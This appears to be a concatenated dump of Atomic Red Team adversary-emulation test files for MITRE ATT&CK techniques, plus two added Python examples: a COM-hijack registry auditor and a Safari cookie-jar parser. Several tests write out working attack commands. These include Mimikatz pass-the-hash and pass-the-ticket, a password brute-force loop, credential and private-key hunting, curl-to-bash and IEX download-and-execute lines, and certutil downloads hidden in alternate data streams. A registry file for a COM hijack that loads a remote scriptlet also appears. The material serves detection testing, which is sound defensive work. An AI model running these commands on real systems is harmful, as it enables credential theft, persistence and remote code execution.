- name: Mimikatz Pass the Hash
  description: |
    Note: must dump hashes first. The default ntlm value is a placeholder, not a valid hex hash.
    [Reference](https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa#pth)

  supported_platforms:
  - windows

  input_arguments:
    user_name:
      description: username
      type: string
      default: Administrator
    domain:
      description: domain
      type: string
      default: atomic.local
    ntlm:
      description: ntlm hash
      type: string
      default: cc36cf7a8514893efccd3324464tkg1a

  executor:
    name: command_prompt
    command: |
      mimikatz # sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}

- name: Mimikatz Kerberos Ticket Attack
  description: |
    Similar to PTH, but attacking Kerberos (pass the ticket). kerberos::ptt injects a ticket from a .kirbi file (or a directory of them), so the argument is a ticket previously exported for #{user_name}@#{domain}, for example with sekurlsa::tickets /export. The default ticket path is a placeholder.

  supported_platforms:
  - windows

  input_arguments:
    user_name:
      description: username
      type: string
      default: Administrator
    domain:
      description: domain
      type: string
      default: atomic.local
    ticket_file:
      description: path of an exported .kirbi ticket for the user
      type: path
      default: ticket.kirbi

  executor:
    name: command_prompt
    command: |
      mimikatz # kerberos::ptt #{ticket_file}
--------------------------------------------------------------------------------
/tests/T1122/src/COMHijack.reg:
--------------------------------------------------------------------------------
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00]
@="AtomicRedTeam"
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00\CLSID]
@="{00000001-0000-0000-0000-0000FEEDACDC}"
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam]
@="AtomicRedTeam"
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam\CLSID]
@="{00000001-0000-0000-0000-0000FEEDACDC}"
[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}]
@="AtomicRedTeam"
[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32]
@="C:\\WINDOWS\\system32\\scrobj.dll"
"ThreadingModel"="Apartment"
[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ProgID]
@="AtomicRedTeam.1.00"
[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ScriptletURL]
@="https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/COMHijackScripts/AtomicRedTeam.sct"
[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\VersionIndependentProgID]
@="AtomicRedTeam"
[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{372FCE38-4324-11D0-8810-00A0C903B83C}]
[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{372FCE38-4324-11D0-8810-00A0C903B83C}\TreatAs]
@="{00000001-0000-0000-0000-0000FEEDACDC}"
--------------------------------------------------------------------------------
/tests/T1176/T1176.todo:
--------------------------------------------------------------------------------
---
attack_technique: T1176
display_name: Browser Extensions

atomic_tests:
- name: Chrome (Developer Mode)
  description: |
    Load the unpacked extension in this directory (manifest.json and inline.js) through Chrome's developer mode.
  supported_platforms:
  - linux
  - windows
  - macos
  executor:
    name: manual
    steps: |
      1. Navigate to [chrome://extensions](chrome://extensions) and
         tick 'Developer Mode'.

      2.
         Click 'Load unpacked extension...' and navigate to
         [Browser_Extension](../t1176/)

      3. Click 'Select'

- name: Chrome (Chrome Web Store)
  description: |
    Install a benign test extension from the Chrome Web Store.
  supported_platforms:
  - linux
  - windows
  - macos
  executor:
    name: manual
    steps: |
      1. Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend
         in Chrome

      2. Click 'Add to Chrome'

- name: Firefox
  description: |
    Load the extension's manifest.json as a temporary add-on in Firefox.
  supported_platforms:
  - linux
  - windows
  - macos
  executor:
    name: manual
    steps: |
      1. Navigate to [about:debugging](about:debugging) and
         click "Load Temporary Add-on"

      2. Navigate to [manifest.json](./manifest.json)

      3. Then click 'Open'
--------------------------------------------------------------------------------
/tests/T1130/T1130.todo:
--------------------------------------------------------------------------------
---
attack_technique: T1130
display_name: Install Root Certificate

atomic_tests:
- name: Install root CA on CentOS/RHEL
  description: |
    Creates a root CA with openssl and adds it to the system trust store
  supported_platforms:
  - linux
  input_arguments:
    key_filename:
      description: Key we create that is used to create the CA certificate
      type: Path
      default: rootCA.key
    cert_filename:
      description: Path of the CA certificate we create
      type: Path
      default: rootCA.crt
  executor:
    name: sh
    command: |
      openssl genrsa -out #{key_filename} 4096
      # -subj avoids the interactive prompts; the CN is arbitrary
      openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/CN=Atomic Red Team Root CA" -out #{cert_filename}

      if [ "$(rpm -q --queryformat '%{VERSION}' centos-release)" -le 5 ]; then
        cat #{cert_filename} >> /etc/pki/tls/certs/ca-bundle.crt
      elif [ "$(rpm -q --queryformat '%{VERSION}' centos-release)" -ge 7 ]; then
        cp #{cert_filename} /etc/pki/ca-trust/source/anchors/
        update-ca-trust
      fi

      # TODO: there was some note about testing like this:

      # # Testing the trusted certificate.
      # To test the new trust, apply the root certificate or another signed with it to
      # a SSL/TLS web service and attempt a connection with curl or wget.
      #
      # curl https://art.evil.com
--------------------------------------------------------------------------------
/tests/T1201/T1201.todo:
--------------------------------------------------------------------------------
---
attack_technique: T1201
display_name: Password Policy Discovery

atomic_tests:
- name: Examine password complexity policy - Ubuntu
  description: |
    Lists the password complexity policy to console on Ubuntu Linux.

  supported_platforms:
  - ubuntu

  executor:
    name: bash
    command: |
      cat /etc/pam.d/common-password

- name: Examine password complexity policy - CentOS/RHEL 7.x
  description: |
    Lists the password complexity policy to console on CentOS/RHEL 7.x Linux.

  supported_platforms:
  - centos

  executor:
    name: bash
    command: |
      cat /etc/security/pwquality.conf

- name: Examine password complexity policy - CentOS/RHEL 6.x
  description: |
    Lists the password complexity policy to console on CentOS/RHEL 6.x Linux.

  supported_platforms:
  - centos

  executor:
    name: bash
    command: |
      cat /etc/pam.d/system-auth

      cat /etc/security/pwquality.conf

- name: Examine password expiration policy - All Linux
  description: |
    Lists the password expiration policy to console on CentOS/RHEL/Ubuntu.

  supported_platforms:
  - linux

  executor:
    name: bash
    command: |
      cat /etc/login.defs
--------------------------------------------------------------------------------
/tests/T1081/T1081.todo:
--------------------------------------------------------------------------------
---
attack_technique: T1081
display_name: Credentials in Files

atomic_tests:
- name: Browser and System credentials
  description: |
    [LaZagne Source](https://github.com/AlessandroZ/LaZagne)

  supported_platforms:
  - macos

  executor:
    name: sh
    command: |
      python2 laZagne.py all

- name: Extract credentials from files
  description: |
    Extracting credentials from files
  input_arguments:
    file_path:
      description: Path to search
      type: String
      default: /
  supported_platforms:
  - macos
  - linux
  executor:
    name: sh
    command: |
      # a fixed word needs no -P (PCRE), which not every grep supports
      grep -ri password #{file_path}

- name: Mimikatz & Kittenz
  description: |
    Mimikatz/kittenz - This will require a Mimikatz executable or invoke-mimikittenz ps module.
  supported_platforms:
  - windows
  executor:
    name: powershell
    command: |
      invoke-mimikittenz
      mimikatz.exe

- name: Extracting credentials from files
  description: |
    Extracting Credentials from Files
  supported_platforms:
  - windows
  executor:
    name: powershell
    command: |
      findstr /si pass *.xml *.doc *.txt *.xls
      ls -R | select-string -Pattern password

--------------------------------------------------------------------------------
/tests/T1035/T1035.yaml:
--------------------------------------------------------------------------------
---
attack_technique: T1035
display_name: Service Execution
tactic: Execution
description: Adversaries may execute a binary, command, or script via a method that interacts with Windows services, such as the Service Control Manager. This can be done by either creating a new service or modifying an existing service. This technique is the execution used in conjunction with New Service and Modify Existing Service during service persistence or privilege escalation.

atomic_tests:
- name: Execute a Command as a Service
  description: |
    Creates a service specifying an arbitrary command and executes it. When executing commands such as PowerShell, the service will report that it did not start correctly even when code executes properly.

  supported_platforms:
  - windows

  input_arguments:
    service_name:
      description: Name of service to create
      type: string
      default: ARTService

    executable_command:
      description: Command to execute as a service
      type: string
      default: '%COMSPEC% /c powershell.exe -nop -w hidden -command New-Item -ItemType File C:\art-marker.txt'

  executor_cmd:
    name: command_prompt
    command: |
      sc.exe create #{service_name} binPath= "#{executable_command}"
      sc.exe start #{service_name}
      sc.exe delete #{service_name}
--------------------------------------------------------------------------------
/tests/T1197/T1197.yaml:
--------------------------------------------------------------------------------
---
attack_technique: T1197
display_name: BITS Jobs
tactic: Defense Evasion, Persistence
description: Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through Component Object Model (COM). BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. Adversaries may abuse BITS to download, execute, and even clean up after malicious code.

atomic_tests:
- name: Download & Execute
  description: |
    This test simulates an adversary leveraging BITS to download a payload: with bitsadmin.exe from the command prompt, or with Start-BitsTransfer from PowerShell. Both only fetch the file into %TEMP%; neither command executes it.

  supported_platforms:
  - windows

  executor_cmd:
    name: command_prompt
    command: |
      bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md %TEMP%\bitsadmin_flag.ps1

  executor_pwr:
    name: powershell
    command: |
      New-Item -ItemType Directory -Force -Path $env:TEMP\AtomicRedTeam | Out-Null
      Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md -Destination $env:TEMP\AtomicRedTeam\bitsadmin_flag.ps1
--------------------------------------------------------------------------------
/tests/T1002/T1002.yaml:
--------------------------------------------------------------------------------
---
attack_technique: T1002
display_name: Data Compressed
tactic: Exfiltration
description: An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. The compression is done separately from the exfiltration channel and is performed using a custom program or algorithm, or a more common compression library or utility such as 7zip, RAR, ZIP, or zlib.

atomic_tests:
- name: Compress Data for Exfiltration
  description: |
    Compress collected data into a single archive

  supported_platforms:
  - windows
  - linux

  input_arguments:
    input_file:
      description: File or directory to compress (Windows executors)
      type: path
      default: /path/to/data
    output_file:
      description: Archive to create (Windows executors)
      type: path
      default: /path/to/archive.zip

  executor_pwr:
    name: powershell
    command: |
      dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file}

  executor_man:
    name: command_prompt
    command: |
      rar a -r #{output_file} #{input_file}

  executor_nix:
    name: sh
    command: |
      mkdir /tmp/victim-files
      cd /tmp/victim-files
      touch a b c d e f g
      echo "This file will be gzipped" > /tmp/victim-gzip.txt
      echo "This file will be tarred" > /tmp/victim-tar.txt
      zip /tmp/victim-files.zip /tmp/victim-files/*
      gzip -f /tmp/victim-gzip.txt
      tar -cvzf /tmp/victim-files.tar.gz /tmp/victim-files/
      tar -cvzf /tmp/victim-tar.tar.gz /tmp/victim-tar.txt
--------------------------------------------------------------------------------
/tests/T1193/T1193.yaml:
--------------------------------------------------------------------------------
---
attack_technique: T1193
display_name: Spearphishing Attachment
tactic: Initial Access
description: Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email.

atomic_tests:
- name: Download Phishing Attachment - VBScript
  description: |
    The macro-enabled Excel file contains VBScript which opens your default web browser and opens it to [google.com](http://google.com).
    The below will successfully download the macro-enabled Excel file to the current location.

  supported_platforms:
  - windows

  executor_man:
    name: powershell
    command: |
      if (-not(Test-Path HKLM:\SOFTWARE\Classes\Excel.Application)){
        return 'Please install Microsoft Excel before running this test.'
      }
      else{
        # the raw.githubusercontent.com path serves the file itself; the github.com/.../blob page is HTML
        $url = 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1193/PhishingAttachment.xlsm'
        $fileName = 'PhishingAttachment.xlsm'
        [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
        # the attachment is binary: DownloadFile keeps the bytes intact, DownloadString/Out-File would re-encode them
        $wc = New-Object System.Net.WebClient
        $wc.DownloadFile($url, (Join-Path (Get-Location) $fileName))
      }
--------------------------------------------------------------------------------
/tests/T1114/T1114.md:
--------------------------------------------------------------------------------
# T1114 - Email Collection
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1114)
Adversaries may target user email to collect sensitive information from a target.

Files containing email data can be acquired from a user's system, such as Outlook storage or cache files .pst and .ost.

Adversaries may leverage a user's credentials and interact directly with the Exchange server to acquire information from within a network.

Some adversaries may acquire user credentials and access externally facing webmail applications, such as Outlook Web Access.

## Atomic Tests

- [Atomic Test #1 - T1114 Email Collection with PowerShell](#atomic-test-1---t1114-email-collection-with-powershell)

## Atomic Test #1 - T1114 Email Collection with PowerShell
Search through the local Outlook installation, extract mail, compress the contents, and save everything to a directory for later exfiltration.

**Supported Platforms:** Windows

#### Run it with `powershell`!
```
# Display email contents in the terminal
PS C:\> .\Get-Inbox.ps1

# Write emails out to a CSV
PS C:\> .\Get-Inbox.ps1 -file "mail.csv"

# Download and Execute
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Get-Inbox.ps1')
```
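The COMHijack.reg file above (T1122) shows the shape of a per-user COM hijack: a `TreatAs` value under `HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID` redirects an existing CLSID to a new one whose in-process server is `scrobj.dll` and which names a `ScriptletURL`, so any process that instantiates the original class as the user ends up running the scriptlet. Because `HKCU\Software\Classes` is consulted before `HKLM` for an unprivileged process, no admin rights are needed. The following is an added example, not code from the Atomic Red Team repository: it parses a `.reg` export and reports exactly that pattern. It assumes the `.reg` text has already been decoded from the UTF-16LE that regedit writes (`open(path, encoding="utf-16")` does that), and the embedded sample is an abridged copy of the page's own COMHijack.reg.

```python
"""Audit a .reg export for user-hive TreatAs redirections that land on a script host."""
import re
from typing import Dict, List

# In-process servers that turn a CLSID into "run this script": scrobj.dll loads
# the scriptlet named by ScriptletURL. Extend with other script hosts if needed.
SCRIPT_HOSTS = {"scrobj.dll"}

TREATAS_RE = re.compile(
    r"^(?P<root>HKEY_CURRENT_USER|HKEY_USERS\\[^\\]+)\\SOFTWARE\\Classes\\CLSID\\"
    r"(?P<clsid>\{[0-9A-Fa-f-]{36}\})\\TreatAs$",
    re.I,
)


def parse_reg(text: str) -> Dict[str, Dict[str, str]]:
    """Parse .reg text into {key: {value_name: data}}; '@' is stored as '(Default)'."""
    keys: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        name, _, data = line.partition("=")
        name = "(Default)" if name == "@" else name.strip('"')
        if data.startswith('"') and data.endswith('"'):      # REG_SZ: unescape \\ and \"
            data = data[1:-1].replace('\\\\', '\\').replace('\\"', '"')
        keys[current][name] = data                            # other value types kept raw
    return keys


def audit_com_hijack(keys: Dict[str, Dict[str, str]]) -> List[Dict]:
    """One finding per user-hive TreatAs whose target CLSID is served by a script host."""
    lowered = {k.lower(): v for k, v in keys.items()}          # registry keys are case-insensitive

    def value(key: str, name: str = "(Default)"):
        return lowered.get(key.lower(), {}).get(name)

    findings = []
    for key in keys:
        match = TREATAS_RE.match(key)
        if not match:
            continue
        target = value(key)
        if not target:
            continue
        base = f"{match.group('root')}\\SOFTWARE\\Classes\\CLSID\\{target}"
        server = value(base + "\\InprocServer32") or ""
        scriptlet = value(base + "\\ScriptletURL")
        reasons = []
        if server.replace("/", "\\").rsplit("\\", 1)[-1].lower() in SCRIPT_HOSTS:
            reasons.append(f"InprocServer32 is {server}")
        if scriptlet:
            reasons.append(f"ScriptletURL is {scriptlet}")
        if reasons:
            findings.append({"clsid": match.group("clsid"), "treat_as": target, "reasons": reasons})
    return findings


# Abridged copy of the page's COMHijack.reg, embedded so the example runs offline.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00]
@="AtomicRedTeam"
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00\CLSID]
@="{00000001-0000-0000-0000-0000FEEDACDC}"
[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}]
@="AtomicRedTeam"
[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32]
@="C:\\WINDOWS\\system32\\scrobj.dll"
"ThreadingModel"="Apartment"
[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ScriptletURL]
@="https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/COMHijackScripts/AtomicRedTeam.sct"
[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{372FCE38-4324-11D0-8810-00A0C903B83C}]
[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{372FCE38-4324-11D0-8810-00A0C903B83C}\TreatAs]
@="{00000001-0000-0000-0000-0000FEEDACDC}"
"""

if __name__ == "__main__":
    for f in audit_com_hijack(parse_reg(SAMPLE_REG)):
        print(f"{f['clsid']} -> TreatAs {f['treat_as']}: " + "; ".join(f["reasons"]))
```

The same check works on a live export (`reg export HKCU\Software\Classes\CLSID out.reg`), and the cleanup file in this directory (COMHijackCleanup.reg) is what should leave `audit_com_hijack` with nothing to report.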
--------------------------------------------------------------------------------
/tests/T1005/T1005.md:
--------------------------------------------------------------------------------
# T1005 - Data from Local System
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1005)
Sensitive data can be collected from local system sources, such as the file system or databases of information residing on the system prior to Exfiltration.

Adversaries will often search the file system on computers they have compromised to find files of interest. They may do this using a [Command-Line Interface](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106), which has functionality to interact with the file system to gather information. Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system.

## Atomic Tests

- [Atomic Test #1 - Search macOS Safari Cookies](#atomic-test-1---search-macos-safari-cookies)

## Atomic Test #1 - Search macOS Safari Cookies
This test uses `grep` to search a macOS Safari binaryCookies file for specified values. This was used by CookieMiner malware. With `-q`, grep prints nothing and only sets its exit status, so check `$?` to see whether the string was found.

**Supported Platforms:** macOS

#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| search_string | String to search Safari cookies to find. | string | coinbase |

#### Run it with `sh`!
```
cd ~/Library/Cookies
grep -q "#{search_string}" "Cookies.binarycookies"
```
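`grep -q` only says whether the substring occurs somewhere in the file; walking the actual record layout of `Cookies.binarycookies` tells you which cookie matched, for which domain, and whether it is flagged Secure or HttpOnly, which is the difference between "a string is present" and "a session token is sitting in this jar". The following is an added example, not code from the Atomic Red Team repository. It follows the widely documented reverse-engineered layout (a big-endian page table, little-endian cookie records, Apple absolute-time doubles for the dates) and ignores the checksum and property list that trail the pages in a real file. The sample jar is constructed inline with the same layout; `build_binarycookies` exists only to produce that test data.

```python
"""Parse Safari's Cookies.binarycookies and search it by cookie field."""
import struct
from typing import Dict, List

APPLE_EPOCH = 978307200            # 2001-01-01 in Unix seconds; binarycookies dates count from here
HEADER_LEN = 56                    # fixed part of a cookie record before its strings


def _cstr(buf: bytes, off: int) -> str:
    """NUL-terminated string at `off`."""
    return buf[off:buf.index(b"\x00", off)].decode("utf-8", "replace")


def parse_page(page: bytes) -> List[Dict]:
    if page[:4] != b"\x00\x00\x01\x00":
        raise ValueError("bad page header")
    (count,) = struct.unpack_from("<i", page, 4)
    offsets = struct.unpack_from("<%di" % count, page, 8)   # page-relative record offsets
    cookies = []
    for off in offsets:
        # size, ?, flags, ?, then offsets of domain/name/path/value (record-relative)
        size, _, flags, _, url_off, name_off, path_off, value_off = struct.unpack_from("<8i", page, off)
        rec = page[off:off + size]
        expires, created = struct.unpack_from("<dd", rec, 40)   # after an 8-byte zero end marker
        cookies.append({
            "domain": _cstr(rec, url_off), "name": _cstr(rec, name_off),
            "path": _cstr(rec, path_off), "value": _cstr(rec, value_off),
            "secure": bool(flags & 1), "httponly": bool(flags & 4),
            "expires": expires + APPLE_EPOCH, "created": created + APPLE_EPOCH,
        })
    return cookies


def parse_binarycookies(data: bytes) -> List[Dict]:
    if data[:4] != b"cook":
        raise ValueError("not a Cookies.binarycookies file")
    (num_pages,) = struct.unpack_from(">i", data, 4)
    sizes = struct.unpack_from(">%di" % num_pages, data, 8)
    pos, cookies = 8 + 4 * num_pages, []
    for size in sizes:
        cookies.extend(parse_page(data[pos:pos + size]))
        pos += size
    return cookies


def find_cookies(data: bytes, needle: str) -> List[Dict]:
    """Cookies whose domain, name or value contains `needle` (case-insensitive)."""
    n = needle.lower()
    return [c for c in parse_binarycookies(data)
            if n in (c["domain"] + c["name"] + c["value"]).lower()]


def build_binarycookies(cookies: List[Dict]) -> bytes:
    """Serialise cookies into a one-page file with the same layout (test-data construction only)."""
    records = []
    for c in cookies:
        strings, offs = b"", {}
        for field in ("domain", "name", "path", "value"):
            offs[field] = HEADER_LEN + len(strings)
            strings += c[field].encode() + b"\x00"
        flags = (1 if c.get("secure") else 0) | (4 if c.get("httponly") else 0)
        rec = struct.pack("<8i", HEADER_LEN + len(strings), 0, flags, 0,
                          offs["domain"], offs["name"], offs["path"], offs["value"])
        rec += b"\x00" * 8 + struct.pack("<dd", c["expires"] - APPLE_EPOCH, c["created"] - APPLE_EPOCH)
        records.append(rec + strings)
    offsets, pos = [], 12 + 4 * len(records)
    for rec in records:
        offsets.append(pos)
        pos += len(rec)
    page = (b"\x00\x00\x01\x00" + struct.pack("<i", len(records))
            + struct.pack("<%di" % len(records), *offsets) + b"\x00" * 4 + b"".join(records))
    return b"cook" + struct.pack(">ii", 1, len(page)) + page + b"\x00" * 8   # trailer left zeroed


# Constructed sample: what a Safari cookie jar might hold on a CookieMiner-style target.
SAMPLE_FILE = build_binarycookies([
    {"domain": ".coinbase.com", "name": "session", "path": "/", "value": "s3cr3t-session-token",
     "secure": True, "httponly": True, "expires": 1800000000, "created": 1700000000},
    {"domain": "example.org", "name": "theme", "path": "/", "value": "abc123",
     "secure": False, "httponly": False, "expires": 1800000000, "created": 1700000000},
])

if __name__ == "__main__":
    for c in find_cookies(SAMPLE_FILE, "coinbase"):
        print(c["domain"], c["name"], c["value"],
              "secure" if c["secure"] else "", "httponly" if c["httponly"] else "")
```

To run it on a real jar, read `~/Library/Cookies/Cookies.binarycookies` in binary mode and pass the bytes to `find_cookies`; on recent macOS releases the file sits behind TCC, so the process needs Full Disk Access or it will get a permission error rather than a parse error.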
--------------------------------------------------------------------------------
/tests/T1110/T1110.todo:
--------------------------------------------------------------------------------
---
attack_technique: T1110
display_name: Brute Force Credential Access

atomic_tests:
- name: Brute Force Credentials
  description: |
    Creates username and password files then attempts to brute force on remote host
  supported_platforms:
  - windows
  input_arguments:
    input_file_users:
      description: Path to a file containing a list of users that we will attempt to brute force
      type: Path
      default: DomainUsers.txt
    input_file_passwords:
      description: Path to a file containing a list of passwords we will attempt to brute force with
      type: Path
      default: passwords.txt
    remote_host:
      description: Hostname of the target system we will brute force upon
      type: String
      default: \\COMPANYDC1\IPC$
    domain:
      description: Domain name of the target system we will brute force upon
      type: String
      default: YOUR_COMPANY
  executor:
    name: command_prompt
    command: |
      net user /domain > #{input_file_users}
      echo "Password1" >> #{input_file_passwords}
      echo "1q2w3e4r" >> #{input_file_passwords}
      echo "Password!" >> #{input_file_passwords}
      @FOR /F %n in (#{input_file_users}) DO @FOR /F %p in (#{input_file_passwords}) DO @net use #{remote_host} /user:#{domain}\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete #{remote_host} > NUL
--------------------------------------------------------------------------------
/tests/T1126/T1126.todo:
--------------------------------------------------------------------------------
---
attack_technique: T1126
display_name: Remove Network Share

atomic_tests:
- name: Add Network Share
  description: |
    Add a Network Share utilizing the command_prompt

  supported_platforms:
  - windows

  input_arguments:
    share_name:
      description: Share to add.
      type: string
      default: \\test\share

  executor:
    name: command_prompt
    command: |
      net use * #{share_name}
      net share test=#{share_name} /REMARK:"test share" /CACHE:No

- name: Remove Network Share
  description: |
    Removes a Network Share utilizing the command_prompt

  supported_platforms:
  - windows

  input_arguments:
    share_name:
      description: Share to remove.
      type: string
      default: \\test\share

  executor:
    name: command_prompt
    command: |
      net share #{share_name} /delete

- name: Remove Network Share PowerShell
  description: |
    Removes a Network Share utilizing PowerShell

  supported_platforms:
  - windows

  input_arguments:
    share_name:
      description: Share to remove.
      type: string
      default: \\test\share

  executor:
    name: powershell
    command: |
      Remove-SmbShare -Name #{share_name}
      Remove-FileShare -Name #{share_name}
--------------------------------------------------------------------------------
/tests/T1145/T1145.todo:
--------------------------------------------------------------------------------
---
attack_technique: T1145
display_name: Private Keys
mitigation: Use strong passphrases for private keys to make cracking difficult. When possible, store keys on separate cryptographic hardware instead of on the local system. Ensure only authorized keys are allowed access to critical resources and audit access lists regularly. Ensure permissions are properly set on folders containing sensitive private keys to prevent unintended access. Use separate infrastructure for managing critical systems to prevent overlap of credentials and permissions on systems that could be used as vectors for lateral movement. Follow other best practices for mitigating access through use of Valid Accounts.
detection: Monitor access to files and directories related to cryptographic keys and certificates as a means for potentially detecting access patterns that may indicate collection and exfiltration activity. Collect authentication logs and look for potentially abnormal activity that may indicate improper use of keys or certificates for remote authentication.

atomic_tests:
- name: Private Keys
  description: |
    Find private keys on the Windows file system.

    File extensions include: .key, .pgp, .gpg, .ppk, .p12, .pem, .pfx, .cer, .p7b, .asc

  supported_platforms:
  - windows

  executor:
    name: command_prompt
    command: |
      echo "ATOMICREDTEAM" > %windir%\cert.key
      dir c:\ /b /s *.key | findstr /e .key
--------------------------------------------------------------------------------
/tests/T1059/T1059.yaml:
--------------------------------------------------------------------------------
---
attack_technique: T1059
display_name: Command-Line Interface
tactic: Execution
description: Command-line interfaces provide a way of interacting with computer systems and are a common feature across many types of operating system platforms. One example command-line interface on Windows systems is cmd, which can be used to perform a number of tasks including execution of other software. Command-line interfaces can be interacted with locally or remotely via a remote desktop application, reverse shell session, etc. Commands that are executed run with the current permission level of the command-line interface process unless the command includes process invocation that changes permissions context for that execution (e.g. Scheduled Task).

atomic_tests:
- name: Command-Line Interface
  description: |
    Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is generally a bad idea if you don't control the server.
    This will download the specified payload and set a marker file in `/tmp/art-fish.txt`.

  supported_platforms:
  - macos
  - centos
  - ubuntu
  - linux

  executor_nix:
    name: sh
    command: |
      bash -c "curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059/echo-art-fish.sh | bash"
      bash -c "wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059/echo-art-fish.sh | bash"
--------------------------------------------------------------------------------
/tests/T1096/T1096.todo:
--------------------------------------------------------------------------------
---
attack_technique: T1096
display_name: NTFS File Attributes

atomic_tests:
- name: Alternate Data Streams (ADS)
  description: |
    Execute from Alternate Streams

    [Reference - 1](https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f)

    [Reference - 2](https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/)

  supported_platforms:
  - windows

  input_arguments:
    path:
      description: Path of ADS file
      type: path
      default: c:\ADS\

  executor:
    name: command_prompt
    command: |
      type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
      extrac32 #{path}\procexp.cab #{path}\file.txt:procexp.exe
      findstr /V /L W3AllLov3DonaldTrump #{path}\procexp.exe > #{path}\file.txt:procexp.exe
      certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
      makecab #{path}\autoruns.exe #{path}\cabtest.txt:autoruns.cab
      print /D:#{path}\file.txt:autoruns.exe #{path}\Autoruns.exe
      reg export HKLM\SOFTWARE\Microsoft\Evilreg #{path}\file.txt:evilreg.reg
      regedit /E #{path}\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
      expand \\webdav\folder\file.bat #{path}\file.txt:file.bat
      esentutl.exe /y #{path}\autoruns.exe /d #{path}\file.txt:autoruns.exe /o
--------------------------------------------------------------------------------
/tests/T1179/src/T1179.sln:
--------------------------------------------------------------------------------

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 15
VisualStudioVersion = 15.0.27703.2018
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "T1179", "T1179\T1179.vcxproj", "{8D90EA8D-EC23-4FD0-AE30-BBBA7B5A9A6F}"
EndProject
Global
	GlobalSection(SolutionConfigurationPlatforms) = preSolution
		Debug|x64 = Debug|x64
		Debug|x86 = Debug|x86
		Release|x64 = Release|x64
		Release|x86 = Release|x86
	EndGlobalSection
	GlobalSection(ProjectConfigurationPlatforms) = postSolution
		{8D90EA8D-EC23-4FD0-AE30-BBBA7B5A9A6F}.Debug|x64.ActiveCfg = Debug|x64
		{8D90EA8D-EC23-4FD0-AE30-BBBA7B5A9A6F}.Debug|x64.Build.0 = Debug|x64
		{8D90EA8D-EC23-4FD0-AE30-BBBA7B5A9A6F}.Debug|x86.ActiveCfg = Debug|Win32
		{8D90EA8D-EC23-4FD0-AE30-BBBA7B5A9A6F}.Debug|x86.Build.0 = Debug|Win32
